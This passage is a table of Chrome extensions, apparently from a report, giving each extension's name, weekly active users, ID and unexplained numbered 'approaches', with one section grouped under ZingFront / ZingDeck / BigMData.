Emoboard Emoji Keyboard 3,000,000 aapdabiebopmbpidefegdaefepkinidd 1, 2, 4
Flappy Bird Original 4,000,000 aejdicmbgglbjfepfbiofnmibcgkkjej 1, 2, 4
Superb Copy 4,000,000 agdjnnfibbfdffpdljlilaldngfheapb 1, 2, 4
Super Volume Booster 1,000,000 ahddimnokcichfhgpibgbgofheobffkb 4
Enlargify 2,000,000 aielbbnajdbopdbnecilekkchkgocifh 1, 2, 4
ImgGet 3,000,000 anblaegeegjbfiehjadgmonejlbcloob 1, 2, 4
Blaze VPN for Chrome 8,000,000 anenfchlanlnhmjibebhkgbnelojooic 1, 2, 4
Web Paint Smart 1,000,000 baaibngpibdagiocgahmnpkegfnldklp 1, 2, 4
Click Color Picker 4,000,000 bfenhnialnnileognddgkbdgpknpfich 1, 2, 4
Dino 3D 3,000,000 biggdlcjhcjibifefpchffmfpmclmfmk 1, 2, 4
Soundup Sound Booster 6,000,000 bjpebnkmbcningccjakffilbmaojljlb 1, 2, 7
Yshot 3,000,000 bkgepfjmcfhiikfmamakfhdhogohgpac 1, 2, 4, 7
VidRate 4,000,000 bmdjpblldhdnmknfkjkdibljeblmcfoi 1, 2, 4
Ultra Volume Booster 3,000,000 bocmpjikpfmhfcjjpkhfdkclpfmceccg 1, 2, 4
Supreme Copy 6,000,000 cbfimnpbnbgjbpcnaablibnekhfghbac 1, 2, 4
Lumina Night Mode 400,000 ccemhgcpobolddhpebenclgpohlkegdg 1, 2, 4
Amazing Screen Recorder 6,000,000 cdepgbjlkoocpnifahdfjdhlfiamnapm 1, 2, 4
BPuzzle 10,000 cgjlgmcfhoicddhjikmjglhgibchboea 1, 2, 4
Super Video Speed Controller 6,000,000 chnccghejnflbccphgkncbmllhfljdfa 1, 2, 4
Lensify 1,000,000 ckdcieaenmejickienoanmjbhcfphmio 1, 2, 4
FontSpotter 2,000,000 cncllbaocdclnknlaciemnogblnljeej 1, 2, 4, 6
ImageNest 2,000,000 dajkomgkhpnmdilokgoekdfnfknjgckh 1, 2, 4
Swift Auto Refresh 4,000,000 dbplihfpjfngpdogehdcocadhockmamf 1, 2, 4
StopSurf 2,000,000 dcjbilopnjnajannajlojjcljaclgdpd 1, 2, 4
PDF SmartBox 10,000,000 dgbbafiiohandadmjfcffjpnlmdlaalh 1, 2, 4
Dungeon Dodge 3,000,000 dkdeafhmbobcccfnkofedleddfbinjgp 1, 2, 4
Scope Master 2,000,000 dlbfbjkldnioadbilgbfilbhafplbnan 1, 2, 4
RazorWave 3,000,000 ecinoiamecfiknjeahgdknofjmpoemmi 1, 2, 4
TurboPlay 4,000,000 ehhbjkehfcjlehkfpffogeijpinlgjik 1, 2, 4
Emoji keyboard live 3,000,000 elhapkijbdpkjpjbomipbfofipeofedj 1, 2, 4
Flashback Flash Player 3,000,000 emghchaodgedjemnkicegacekihblemd 1, 2, 4
RampShield Adblock 2,000,000 engbpelfmhnfbmpobdooifgnfcmlfblf 1, 2, 3, 4
BackNav 2,000,000 epalebfbjkaahdmoaifelbgfpideadle 1, 2, 4
Spark blocker 5,000,000 gfplodojgophcijhbkcfmaiafklijpnf 1, 2, 7
EmuFlash 1,000,000 ghomhhneebnpahhjegclgogmbmhaddpi 1, 2, 4
Minesweeper Original 4,000,000 gjdmanggfaalgnpinolamlefhcjimmam 1, 2, 4
PixGrid Ruler 1,000,000 glkplndamjplebapgopdlbicglmfimic 1, 2, 4
Flexi PDF Reader 1,000,000 gmpignfmmkcpnildloceikjmlnjdjgdg 1, 2, 4
Dino Rush 2,000,000 hbkkncjljigpfhghnjhjaaimceakjdoo 1, 2, 4
Amazing color picker 4,000,000 hclbckmnpbnkcpemopdngipibdagmjei 1, 2, 4
ChatGPT Assistant Plus 6,000,000 hhclmnigoigikdgiflfihpkglefbaaoa 1, 2, 4
Bspace 3,000,000 hhgokdlbkelmpeimeijobggjmipechcp 1, 2, 4
Bomberman Classic Game 4,000,000 hlcfpgkgbdgjhnfdgaechkfiddkgnlkg 4
Inline Lingo 4,000,000 hmioicehiobjekahjabipaeidfdcnhii 1, 2, 4
Superpowers for Chatgpt 4,000,000 ibeabbjcphoflmlccjgpebbamkbglpip 1, 2, 4
Spark Auto Refresh 4,000,000 ifodiakohghkaegdhahdbcdfejcghlob 1, 2, 4
Video Speed Pro 6,000,000 iinblfpbdoplpbdkepibimlgabgkaika 1, 2, 4
Elysian EPUB Reader 10,000 ijlajdhnhokgdpdlbiomkekneoejnhad 1, 4
Smart Color Picker 1,000,000 ilifjbbjhbgkhgabebllmlcldfdgopfl 1, 2, 4
Ad Skip Master for Youtube 6,000,000 imlalpfjijneacdcjgjmphcpmlhkhkho 1, 2, 4, 7
Shopify spy scraper & parser 300,000 injdgfhiepghpnihhgmkejcjnoohaibm 1, 2, 4
Gloom Dark Mode 4,000,000 ioleaeachefbknoefhkbhijdhakaepcb 1, 2, 4
SnapTrans 3,000,000 jfcnoffhkhikehdbdioahmlhdnknikhl 1, 2, 4
DownloadAs PNG JPG 2,000,000 jjekghbhljeigipmihbdeeonafimpole 1, 2, 4
Umbra Dark Mode 3,000,000 jjlelpahdhfgabeecnfppnmlllcmejkg 1, 2, 4
Power Tools for ChatGPT 11,000,000 jkfkhkobbahllilejfidknldjhgelcog 1, 2, 4, 6
Image Formatter 7,000 kapklhhpcnelfhlendhjfhddcddfabap 1, 2, 4
Safum free VPN 6,000,000 kbdlpfmnciffgllhfijijnakeipkngbe 1, 2, 3, 4
TabColor color picker 500,000 kcebljecdacbgcoiajdooincchocggha 1, 2, 4
Tonalis Audio Recorder 3,000,000 kdchfpnbblcmofemnhnckhjfjndcibej 1, 2, 4
2048 Classic Game 6,000,000 kgfeiebnfmmfpomhochmlfmdmjmfedfj 4
Pixdownify 7,000 kjeimdncknielhlilmlgbclmkbogfkpo 1, 2, 4, 7
Avatar Maker Studio 3,000,000 klfkmphcempkflbmmmdphcphpppjjoic 1, 2, 4
TypeScan What Font Finder 2,000,000 klopcieildbkpjfgfohccoknkbpchpcd 1, 2, 4
Rad Video Speed Controller 1,000,000 knekhgnpelgcdmojllcbkkfndcmnjfpp 1, 2, 4
Sublime Copy 2,000,000 kngefefeojnjcfnaegliccjlnclnlgck 1, 2, 4
2048 Game 6,000,000 kopgfdlilooenmccnkaiagfndkhhncdn 4
Easy PDF Viewer 600,000 kppkpfjckhillkjfhpekeoeobieedbpd 1, 2, 4
Fullshot 900,000 lcpbgpffiecejffeokiimlehgjobmlfa 1, 2, 4
Page Auto Refresh 8,000,000 ldgjechphfcppimcgcjcblmnhkjniakn 1, 2, 4
Viddex Video Downloader 2,000,000 ldmhnpbmplbafajaabcmkindgnclbaci 1, 2, 4
Smart Audio Capture 3,000,000 lfohcapleakcfmajfdeomgobhecliepj 1, 2, 4
Readline 3,000,000 lgfibgggkoedaaihmmcifkmdfdjenlpp 1, 2, 4
Amazing Auto Refresh 6,000,000 lgjmjfjpldlhbaeinfjbgokoakpjglbn 1, 2, 4
Picture in Picture player 5,000,000 lppddlnjpnlpglochkpkepmgpcjalobc 1, 2, 4
Readwell 1,000,000 mafdefkoclffkegnnepcmbcekepgmgoe 1, 2, 4
Screenshot X 1,000,000 mfdjihclbpcjabciijmcmagmndpgdkbp 1, 2, 3, 4
TubeBlock - Adblock for Youtube 7,000,000 mkdijghjjdkfpohnmmoicikpkjodcmio 1, 2, 4
Shade Dark Mode 16,000,000 mkeimkkbcndbdlfkbfhhlfgkilcfniic 1, 2, 4
PDF Wizardry 3,000,000 moapkmgopcfpmljondihnidamjljhinm 1, 2, 4
ShieldSpan Adblock 2,000,000 monfcompdlmiffoknmpniphegmegadoa 1, 2, 3, 4
Snap Color Picker 6,000,000 nbpljhppefmpifoffhhmllmacfdckokh 1, 2, 4
Spelunky Classic 3,000,000 nggoojkpifcfgdkhfipiikldhdhljhng 4
Adkrig 6,000,000 ngpkfeladpdiabdhebjlgaccfonefmom 1, 2, 3, 4
Snap Screen Recorder 4,000 njmplmjcngplhnahhajkebmnaaogpobl 1, 2, 4
SharpGrip 3,000,000 nlpopfilalpnmgodjpobmoednbecjcnh 1, 2, 4
Block Site Ex 20,000 nnkkgbabjapocnoedeaifoimlbejjckj 1, 2, 4
PageTurn Book Reader 1,000,000 oapldohmfnnhaledannjhkbllejjaljj 1, 2, 4
FocusShield 4,000,000 ohdkdaaigbjnbpdljjfkpjpdbnlcbcoj 1, 2, 4
Loudify Volume Booster 7,000,000 ohlijedbbfaeobchboobaffbmpjdiinh 1, 2, 4
ChatGPT Toolkit 6,000,000 okanoajihjohgmbifnkiebaobfkgenfa 4
Pac Man Tribute 3,000,000 okkijechcafgdmbacodaghgeanecimgd 1, 2, 4
Wordle Timeless 3,000,000 pccilkiggeianmelipmnakallflhakhh 4
Web Paint Online 3,000,000 pcgjkiiepdbfbhcddncidopmihdekemj 1, 2, 4
Live Screen Recorder 4,000,000 pcjdfmihalemjjomplpfbdnicngfnopn 1, 2, 4
Screenshot Master 6,000,000 pdlmjggogjgoaifncfpkhldgfilgghgc 1, 2, 4
Emojet - Emoji Keyboard 4,000,000 pgnibfiljggdcllbncbnnhhkajmfibgp 1, 2, 4
Metric Spy 2,000,000 plifocdammkpinhfihphfbbnlggbcjpo 1, 2, 4
Tetris Classic 6,000,000 pmlcjncilaaaemknfefmegedhcgelmee 1, 2, 4

ZingFront / ZingDeck / BigMData

Name Weekly active users Extension ID Approaches
Download Telegram - TG Video Photo Download 1,000 aaanclnbkhoomaefcdpcoeikacfilokk 1
Open AI ChatGPT for Email - GMPlus 40,000 abekedpmkgndeflcidpkkddapnjnocjp 1, 5
AI Cover Letter Generator - Supawork AI 2,000 aceohhcgmceafglcfiobamlbeklffhna 1, 2
AI Headshot Generator - Supawork AI 5,000 acgbggfkaphffpbcljiibhfipmmpboep 1, 6
IG Follower Export Tool - IG Email Extractor 10,000 acibfjbekmadebcjeimaedenabojnnil 1
WA Sender - Bulk Message & WA Message & Bulk Sender Tool 3,000 aemhfpfbocllfcbpiofnmacfmjdmoecf 1, 5
Save Ins Comment - Export Ins Comments 1,000 afkkaodiebbdbneecpjnfhiinjegddco 1
Coursera Summary with ChatGPT and Take Notes 3,000 afmnhehfpjmkajjglfakmgmjcclhjane 1, 2, 5
Extension Manager for Chrome™ 966 ahbicehkkbofghlofjinmiflogakiifo 1, 5
Email Finder & Email Hunter - GMPlus 10,000 aihgkhchhecmambgbonicffgneidgclh 1, 5
Sora Video To Video - Arting AI 106 aioieeioikmcgggaldfknjfoeihahfkb 1, 2
ChatGPT for 知乎 415 ajnofpkfojgkfmcniokfhodfoedkameh 1, 2, 5
Walmart Finder&ChatGPT Review Analysis 457 akgdobgbammbhgjkijpcjhgjaemghhin 5
WA Bulk Message Sender - Premium Sender 1,000 amokpeafejimkmcjjhbehganpgidcbif 1
One-Click Search Aliexpress Similar Products 97 aobhkgpkibbkonodnakimogghmiecend 5
Summary with Bing Chat for YouTube 9,000 aohgbidimgkcolmkopencknhbnchfnkm 1, 5
Rakuten Customer Service Helper 42 apfhjcjhmegloofljjlcloiolpfendka 5
ChatBot AI - ChatGPT & Claude & Bard & Bing 883 apknopgplijcepgmlncjhdcdjifhdmbo 4, 5
NoteGPT: YouTube Summary, Webpages & PDF Summary 200,000 baecjmoceaobpnffgnlkloccenkoibbb 5
Dimmy - Discord Chat Exporter 252 bbgnnieijkdeodgdkhnkildfjbnoedno 1
Gmail Notes - Add notes to email in Gmail 1,000 bbpgdlmdmlalbacneejkinpnpngnnghj 5
Sora Image To Video - Arting AI 372 bdhknkbhmjkkincjjmhibjeeljdmelje 1, 2
Tiktok Customer Service Helper 66 bdkogigofdpjbplcphfikldoejopkemf 5
TikClient - Web Client for TikTok™ 10,000 beopoaohjhehmihfkpgcdbnppdeaiflc 1, 2, 6
One-Click Search Amazon Similar Products 146 bfeaokkleomnhnbhdhkieoebioepbkkb 5
Custom New Tab Page 864 bfhappcgfmpmlbmgbgmjjlihddgkeomd 5
Shopee Downloader - Download Videos & Images 3,000 bfmonflmfpmhpdinmanpaffcjgpiipom 1, 2, 5
Product Photography - Ai Background Generator For Prouduct Photos 46 bgehgjenjneoghlokaelolibebejljlh 1, 2
TikGPT: Tiktok Listing Optimizer 665 bhbjjhpgpiljcinblahaeaijeofhknka 5
Find WhatsApp Link - Group Invite Link 2,000 biihmgacgicpcofihcijpffndeehmdga 1, 5
VideoTG - Download & Save telegram Videos Fast & one time! 4,000 bjnaoodhkicimgdhnlfjfobfakcnhkje 1
Etsy™ AI Review Analysis & Download 8,000 bjoclknnffeefmonnodiakjbbdjdaigf 5
iGoo Helper - Security Privacy Unblock VPN 20,000 bkcbdcoknmfkccdhdendnbkjmhdmmnfc 5
TikTok Analytics & Sort Video by Engagement 1,000 bnjgeaohcnpcianfippccjdpiejgdfgj 5
Rakuten AI Listing editor 68 cachgfjiefofkmijjdcdnenjlljpiklj 5
Invite All Friends for Facebook™ in one click 10,000 cajeghdabniclkckmaiagnppocmcilcd 5
EbayGPT: ChatGPT Ebay listing optimization 2,000 cbmmciaanapafchagldbcoiegcajgepo 5
Comment Exporter 10,000 cckachhlpdnncmhlhaepfcmmhadmpbgp 1, 2
Twitch Danmaku(NicoNico style) 646 cecgmkjinnohgnokkfmldmklhocndnia 5
Easy Exporter - Etsy order exporter 2,000 cgganjhojpaejcnglgnpganbafoloofa 5
Privacy Extension for WhatsApp Privacy 100,000 cgipcgghboamefelooajpiabilddemlh 1, 2
Group Extractor for social media platform 1,000 chldekfeeeaolinlilgkeaebbcnkigeo 6
Sales Sort for eBay™ Advanced Search 4,000 cigjjnkjdjhhncooaedjbkiojgelfocc 1, 2, 3, 5
Amazon Customer Service Helper 70 cmfafbmoadifedfpkmmgmngimbbgddlo 5
Currency Conversion Calculator 2,000 cmkmopgjpnjhmlgcpmagbcfkmakeihof 5
LinkedRadar-Headline Generator for LinkedIn™ 1,000 cnhoekaognmidchcealfgjicikanodii 1, 5
AllegroGPT:ChatGPT for Allegro Open AI Writer 163 coljimimahbepcbljijpimokkldfinho 5
ai voice cover 518 cpjhnkdcdpifokijolehlmomppnfflop 1
WA Contacts Extractor 30,000 dcidojkknfgophlmohhpdlmoiegfbkdd 1
Twitch chat overlay on fullscreen 832 dckidogeibljnigjfahibbdnagakkiol 5
Privacy Extension for WhatsApp Privacy 660 dcohaklbddmflhmcnccgcajgkfhchfja 1
LINE App Translator Bot - LINE Chat 1,000 dimpmploihiahcbbdoanlmihnmcfjbgf 5
Etsy Image Search 1,000 dkgoifbphbpimdbjhkbmbbhhfafjdilp 5
AliExpress & eBay - Best price 575 dkoidcgcbmejimkbmgjimpdgkgilnncj 5
AliGPT: Aliexpress Listing Optimize 1,000 dlbmngbbcpeofkcadbglihfdndjbefce 5
Best ASO Tools for Google Play Store 10,000 doffdbedgdhbmffejikhlojkopaleian 5
NoteGPT: AI Flashcard for Quizlet and Cram 10,000 eacfcoicoelokngmcgkkdakohpaklgmk 1, 2, 5
ChatSider AI Copilot : ChatGPT & Claude 2,000 ecnknpjoomhilbhjipoipllgdgaldhll 6
Mercadolivre Customer Service Helper with GPT 19 edhpagpcfhelpopmcdjeinmckcjnccfm 5
WA Contacts Extractor Free Extension 30,000 eelhmnjkbjmlcglpiaegojkoolckdgaj 1, 6
Unlimited Summary Generator for YouTube™ 70,000 eelolnalmpdjemddgmpnmobdhnglfpje 1, 2, 5
AdLibNote: Ad Library Downloader Facebook™ 10,000 efaadoiclcgkpnjfgbaiplhebcmbipnn 1, 2
Ebay Kundendiensthelfer mit GPT 123 efknldogiepheifabdnikikchojdgjhb 5
Extension Manager 8,000 efolofldmcajcobffimbnokcnfcicooc 5
Send from Gmail - Share a Link Via Email 5,000 egefdkphhgpfilgcaejconjganlfehif 1, 3, 5
Followers Exporter for Ins 100,000 ehbjlcniiagahknoclpikfjgnnggkoac 1, 2
Website Keyword Extractor & Planner Tool 10,000 eiddpicgliccgcgclfoddoiebfaippkj 6
AMZ Currency Converter —— Amazon TS 457 ekekfjikpoacmfjnnebfjjndfhlldegj 1
eCommerce Profit Calculator 3,000 elclhhlknlgnkbihjkneaolgapklcakh 1, 2, 5
ChatGPT for Google (No Ads) 30,000 elnanopkpogbhmgppdoapkjlfigecncf 1, 3, 5
AI Resume Builder - Supawork AI 9,000 epljmdbeelhhkllonphikmilmofkfffb 1, 4
aliexpress image video download 1,000 epmknedkclajihckoaaoeimohljkjmip 5
InstaNote: Download and Save Video for IG 10,000 fbccnclbchlcnpdlhdjfhbhdehoaafeg 1, 2, 5
Ebay Niche Finder&ChatGPT Review Analysis 419 fencfpodkdpafgfohkcnnjjepolndkoc 5
One-Click Search Etsy Similar Products 83 fffpcfejndndidjbakpmafngnmkphlai 5
WA Link Generator 315 fgmmhlgbkieebimhondmhbnihhaoccmj 1
AI Script Writer & Video to Text for TikTok 9,000 fhbibaofbmghcofnficlmfaoobacbnlm 1, 2, 5
WA Bulk Message Sender 100,000 fhkimgpddcmnleeaicdjggpedegolbkb 1, 5
Free VPN For Chrome - HavenSurf VPN 3,000 fnofnlokejkngcopdkaopafdbdcibmcm 5
McdGPT: Mercadolivre AI Listing edit 340 fpgcecmnofcebcocojgbnmlakeappphj 5
CRM Integration with LinkedIn for Salesforce 411 fpieanbcbflkkhljicblgbmndgblndgh 5
Online Photoshop - Photo Editor Tool 577 fplnkidbpmcpnaepdnjconfhkaehapji 1, 2, 5
Telegram Private Video Downloader 20,000 gdfhmpjihkjpkcgfoclondnjlignnaap 1, 2
AI Signature Generator - SignMaker 74 gdkcaphpnmahjnbbknailofhkdjgonjp 1, 2, 5
Privacy Extension for WhatsApp Web 2,000 gedkjjhehhbgpngdjmjoklficpaojmof 1
One-Click Search Shein Similar Products 232 gfapgmkimcppbjmkkomcjnamlcnengnp 5
Summary with ChatGPT for Google and YouTube 10,000 gfecljmddkaiphnmhgaeekgkadnooafb 1, 2, 5
ESale - Etsy™ SEO tool for seller 10,000 ghnjojhkdncaipbfchceeefgkkdpaelk 5
Twitter Video Downloader 10,000 giallgikapfggjdeagapilcaiigofkoe 1, 2, 5
Video Downloader and Summary for TikTok 3,000 gibojgncpopnmbjnfdgnfihhkpooodie 1, 2, 5
Audio Recorder Online - Capture Screen Audio 3,000 gilmhnfniipoefkgfaoociaehdcmdcgk 1, 2, 5
WalmartGPT:ChatGPT for Walmart Open AI Writer 682 gjacllhmphdmlfomfihembbodmebibgh 5
ChatShopee - AI Customer Service Helper 88 glfonehedbdfimabajjneobedehbpkcf 5
Magic VPN - Best Free VPN for Chrome 5,000 glnhjppnpgfaapdemcpihhkobagpnfee 5
Translate and Speak Subtitles for YouTube 40,000 gmimaknkjommijabfploclcikgjacpdn 1, 2, 3, 5
Messenger Notifier 3,000 gnanlfpgbbiojiiljkemdcampafecbmk 5
One-Click Search Walmart Similar Products 103 golgjgpiogjbjbaopjeijppihoacbloi 5
TikTok Hashtags Tool - Hashtags Analytics 779 haefbieiimgmamklihjpjhnhfbonfjgg 1, 5
Gmail Checker - Multi Account Gmail Notifier 9,000 hangbmidafgeohijjheoocjjpdbpaaeh 1, 5
Bulk Message Sender for wa 281 hcbplmjpaneiaicainjmanjhmdcfpeji 2
APP For IG DM 10,000 hccnecipbimihniebnopnmigjanmnjgh 1, 2, 5
Likes Exporter 6,000 hcdnbmbdfhhfjejboimdelpfjielfnde 1, 2
ChatsNow: ChatGPT AI Sidebar ( GPT, Claude , Gemini) 20,000 hcmiiaachajoiijecmakkhlcpagafklj 1, 2, 5
iTextMaster - ChatPDF & PPT AI with ChatGPT 6,000 hdofgklnkhhehjblblcdfohmplcebaeg 1, 2, 3, 5
Shopify™ Raise - Shopify™ store analysis tool 10,000 hdpfnbgfohonaplgnaahcefglgclmdpo 1, 2, 3
ShopeeGPT - Optimize Titles & Descriptions 713 hfgfkkkaldbekkkaonikedmeepafpoak 5
Telegram Desktop - Telegram Online Messenger 4,000 hifamcclbbjnekfmfgcalafnnlgcaolc 5
CommentGPT - Shopee review analysis assistant 321 hjajjdbieadchdmmifdjgedfhgdnonlh 5
Vimeo™ Downloader and chatGPT Video Summary 40,000 hobdeidpfblapjhejaaigpicnlijdopo 1, 2, 5
IG Comment Export Tool 4,000 hpfnaodfcakdfbnompnfglhjmkoinbfm 1, 2, 5
SEO Search Keyword Tool 40,000 hpmllfbpmmhjncbfofmkkgomjpfaocca 5
IG Video Downloader - SocialPlus 5,000 iaonookehgfokaglaodkeooddjeaodnc 1, 2, 5
AdLibNote: Video Downloader for Facebook™ 10,000 icphfngeemckldjnnoemfadfploieehk 1, 2, 5
IGExporter - IG Follower Export Tool 2,000 iffbofdalhbflagjclkhbkbknhiflcam 1, 2, 5
Wasup Translator - Translate WhatsApp Messages 328 ifhamodfnpjalblgmnpdidnkjjnmkbla 1, 5
Free VPN For Chrome - HavenSurf VPN 1,000 ihikodioopffhlfhlcjafeleemecfmab 5
TelePlus - Multi-Accounts Sender 8,000 ihopneheidomphlibjllfheciogojmbk 1, 2, 5
Keywords Explorer For Google Play Store (ASO) 2,000 ijegkehhlkpmicapdfdjahdmpklimdmp 6
Mass follow for Twitter 1,000 ijppobefgfjffcajmniofbnjkooeneog 1, 5
Etsy Customer Service Helper with ChatGPT 506 ikddakibljikfamafepngmlnhjilbcci 5
Telegram Group and Channel Search Tool 7,000 ilpgiemienkecbgdhdbgdjkafodgfojl 1, 2, 5, 7
NoteGPT: Udemy Summary with ChatGPT & Claude 8,000 indcipieilphhkjlepfgnldhjejiichk 1, 2, 5
Volume booster - Volumax 2,000 ioklejjbhddpcdgmpcnnpaoopkcegopp 6
AmzGPT: Amazon listing edit 4,000 jijophmdjdapikfmbckmhhiheghkgoee 5
TTNote: Video Downloader and Saver 30,000 jilgamolkonoalagcpgjjijaclacillb 1, 2, 5
GS Helper For Google Search Google Scholar 2,000 jknbccibkbeiakegoengboimefmadcpn 5
WASender - WA Bulk Message Sender 1,000 jlhmomandpgagmphfnoglhikpedchjoa 1
ai celebrity voice clone 572 jlifdodinblfbkbfmjinkpjieglkgfko 1
WAPlus CRM - Best WhatsApp CRM with AI 60,000 jmjcgjmipjiklbnfbdclkdikplgajhgc 1
Save Webpage As PDF 10,000 jncaamlnmeladalnajhgbkedibfjlmde 5
Etsy™ Reviews Extractor 1,000 jobjhhfnfkdkmfcjnpdjmnmagepnbifi 5
AI Image Generator: Get AI Art with Any Input 1,000 jojlhafjflilmhpakmmnchhcbljgmllh 5
TG Sender - TG bulk message send and invite 20,000 kchbblidjcniipdkjlbjjakgdlbfnhgh 1, 2, 5
QR Code Generator 25 kdhpgmfhaakamldlajaigcnanajekhmp 1
Browser VPN - Free and unlimited VPN proxy 7,000 kdjilbflpbbilgehjjppohpfplnapkbp 5
Summary Duck Assistant 1,000 kdmiipofdmffkgfpkigioehfdehcienf 1, 2
FindNiche - aliexpress™ dropshipping & analytics tool 1,000 kgggfelpkelliecmgdmfjgnlnhfnohpi 2, 3, 5
LinkedRadar - Email Finder for LinkedIn ™ 50,000 kgpckhbdfdhbkfkepcoebpabkmnbhoke 1, 5
WA - Download Group Phone Numbers 4,000 khajmpchmhlhfcjdbkddimjbgbchbecl 1, 5
WA Self Sender for WhatsApp Web(Easy Sender) 10,000 khfmfdepnleebhonomgihppncahojfig 1
GPT for Ecom: Product Listing optimizer 20,000 khjklhhhlnbeponjimmaoeefcpgbpgna 1, 2, 5
IG Follower Export Tool - IG Tools 100,000 kicgclkbiilobmccmmidfghnijgfamdb 1, 2, 5
WhatsApp Realtime Translate&Account Warm Up&Voice message Transcript 1,000 kifbmlmhcfecpiidfebchholjeokjdlm 1, 5
WA Group Sender 10,000 kilbeicibedchlamahiimkjeilnkgmeo 5
FindNiche - Shopify™ store traffic analysis 7,000 kiniklbpicchjlhhagjhchoabjffogni 1, 2, 3, 5, 7
Telegram Restricted Content Downloader 7,000 kinmpocfdjcofdjfnpiiiohfbabfhhdd 1, 2
website broken link and 404 error checker 10,000 kkjfobdnekhdpmgomkpeibhlnmcjgian 1, 2, 5
TG Content Downloader - download telegram restricted files 983 kljkjamilbfohkmbacbdongkddmoliag 1, 5
Comment Assistant In LinkedIn™ 978 kmchjegahcidgahijkjoaheobkjjgkfj 5
Tab Manager - Smart Tab By NoteGPT AI 7,000 kmmcaankjjonnggaemhgkofiblbjaakf 1, 2, 5
WA Number Checker 5,000 knlfobadedihfdcamebpjmeocjjhchgm 1, 2
Telegram downloader - TG Video Photo Download 4,000 kofmimpajnbhfbdlijgcjmlhhkmcallg 1
WA Group Link Finder 2,000 kpinkllalgahfocbjnplingmpnhhihhp 1, 2
One-Click Search Ozon Similar Products 96 laoofjicjkiphingbhcblaojdcibmibn 5
WADeck - WA AI ChatBot &WhatsApp Sender 40,000 lbjgmhifiabkcifnmbakaejdcbikhiaj 1, 5
AliNiche Finder&ChatGPT Review Analysis 484 ldcmkjkhnmhoofhhfendhkfmckkcepnj 5
Fashion Model-AI Model Generator For Amazon 1,000 ldlimmbggiobfbblnjjpgdhnjdnlbpmo 1, 5
WhatsApp Group Management Pro - Export, Broadcast & Monitor Suite 20,000 ldodkdnfdpchaipnoklfnfmbbkdoocej 1, 2, 5
Photo download & Save image 8,000 leiiofmhppbjebdlnmbhnokpnmencemf 5
Aliexpress Customer Service Helper 191 lfacobmjpfgkicpkigjlgfjoopajphfc 5
Find WhatsApp Link - Group Invite Link 10,000 lfepbhhhpfohfckldbjoohmplpebdmnd 5
Yahoo - optimize listing & AI Writer 69 lgahpgiabdhiahneaooneicnhmafploc 5
Amazon Finder&ChatGPT Review Analysis 821 lgghbdmnfofefffidlignibjhnijabad 5
AI Resume Builder - LinkedRadar 10,000 lijdbieejfmoifapddolljfclangkeld 1, 4
Article Summary with ChatGPT and Take Notes 8,000 llkgpihjneoghmffllamjfhabmmcddfh 1, 2, 5
AliNiche - AliExpress™ Product Research Tool 30,000 lmlkbclipoijbhjcmfppfgibpknbefck 1, 2, 5
ModelAgents - AI Fashion Models Generator 5,000 lmnagehbedfomnnkacohdhdcglefbajd 5
Gmail Address Check & Send Verify Tool 2,000 lmpigfliddkbbpdojfpbbnginolfgdoh 5
WA Number Checker - Check & Verify WA Number 5,000 lobgnfjoknmnlljiedjgfffpcbaliomk 1
Free AI Voice: Best Text to Speech Tool 1,000 lokmkeahilhnjbmgdhohjkofnoplpmmp 5
IG Email Extractor - Ins Followers Exporter 3,000 lpcfhggocdlchakbpodhamiohpgebpop 1, 5
WA Bulk Sender 5,000 mbmlkjlaognpikjodedmallbdngnpbbn 1
YouTube Comment Summary with ChatGPT OpenAI 3,000 mcooieiakpekmoicpgfjheoijfggdhng 5
Ad Library - Ads Spy Tool For YouTube™ 2,000 mdbhllcalfkplbejlljailcmlghafjca 5
Schedule Email by Gmail 862 mdndafkgnjofegggbjhkccbipnebkmjc 1, 5
Feature Graphic Downloader for Play Store 546 meibcokbilaglcmbboefiocaiagghdki 5
One-Click Search eBay Similar Products 75 mjibhnpncmojamdnladbfpcafhobhegn 5
Twiclips - Twitch Clip Downloader 8,000 mjnnjgpeccmgcobgegepeljeedilebif 1, 2, 5
Auto Connect for LinkedIn™ - LeadRadar 1,000 mliipdijmfmbnemagicfibpffnejhcki 1
Easy Web Data Scraper 40,000 mndkmbnkepbhdlkhlofdfcmgflbjggnl 1, 2, 3, 5
wa privacy 68 nccgjmieghghlknedlgoeljlcacimpma 1
Ad Library - Ads Spy Tool For Pinterest™ 2,000 ndopljhdlodembijhnfkididjnahadoj 5
Universal Keyword Planner box 5,000 niaagjifaifoebkdkkndbhdoamicolmj 1, 2, 5
AdLibNote: Ad Library Downloader Facebook™ 30,000 niepmhdjjdggogblnljbdflekfohknmc 1, 2
WA Group Sender & Group Link Scraper 1,000 nimhpogohihnabaooccdllippcaaloie 1, 2
Ad Library - Ads Spy Tool For Twitter™ 1,000 nkdenifdmkabiopfhaiacfpllagnnfaj 5
TikTok Video Tags Summary with ChatGPT 860 nmccmoeihdmphnejppahljhfdggediec 5
Image Zoom Tool 5,000 nmpjkfaecjdmlebpoaofafgibnihjhhf 1, 2, 5
ChatSider:Free ChatGPT Assistant(GPT4) 1,000 nnadblfkldnlfoojndefddknlhmibjme 7
Telegram Channels - TG Channel Link Search 1,000 nnbjdempfaipgaaipadfgfpnjnnflakl 5
H1B Sponsor Checker, Job Seek - LinkedRadar 463 noiaognlgocndhfhbeikkoaoaedhignb 1, 4, 5
WAContactSaver 7,000 nolibfldemoaiibepbhlcdhjkkgejdhl 1
vk video downloader - vkSaver 10,000 npabddfopfjjlhlimlaknekipghedpfk 1, 2, 5
Multi Chat - All Chat In One For You - SocialPlus 1,000 oaknbnbgdgflakieopfmgegbpfliganc 1, 2, 5
Twitch Channel Points Auto Claimer -Twiclips 3,000 ocoimkjodcjigpcgfbnddnhfafonmado 5
WalmartHunt-Walmart Dropshipping Tools 4,000 oeadfeokeafokjbffnibccbbgbjcdefe 1, 2, 5
TTAdNote: Download and Save Ad No Watermark 8,000 oedligoomoifncjcboehdicibddaimja 1, 2, 5
Discordmate - Discord Chat Exporter 20,000 ofjlibelpafmdhigfgggickpejfomamk 5
Social Media Downloader - SocialPlus 4,000 ofnmkjeknmjdppkomohbapoldjmilbon 1
NoteGPT: ChatGPT Summary for Vimeo 5,000 oihfhipjjdpilmmejmbeoiggngmaaeko 1, 2, 5
Aliexpress search by image 5,000 ojpnmbhiomnnofaeblkgfgednipoflhd 1, 2, 5
Privacy Extension for WhatsApp Web 4,000 okglcjoemdnmmnodbllbcfaebeedddod 1
Denote: Save Ads TikTok & FB Ad Library 40,000 okieokifcnnigcgceookjighhplbhcip 1, 2
Allegro Customer Service Helper with Open AI 13 olfpfedccehidflokifnabppdkideeee 5
LinkedRadar - LinkedIn Auto Connect Tool 198 onjifbpemkphnaibpiibbdcginjaeokn 1
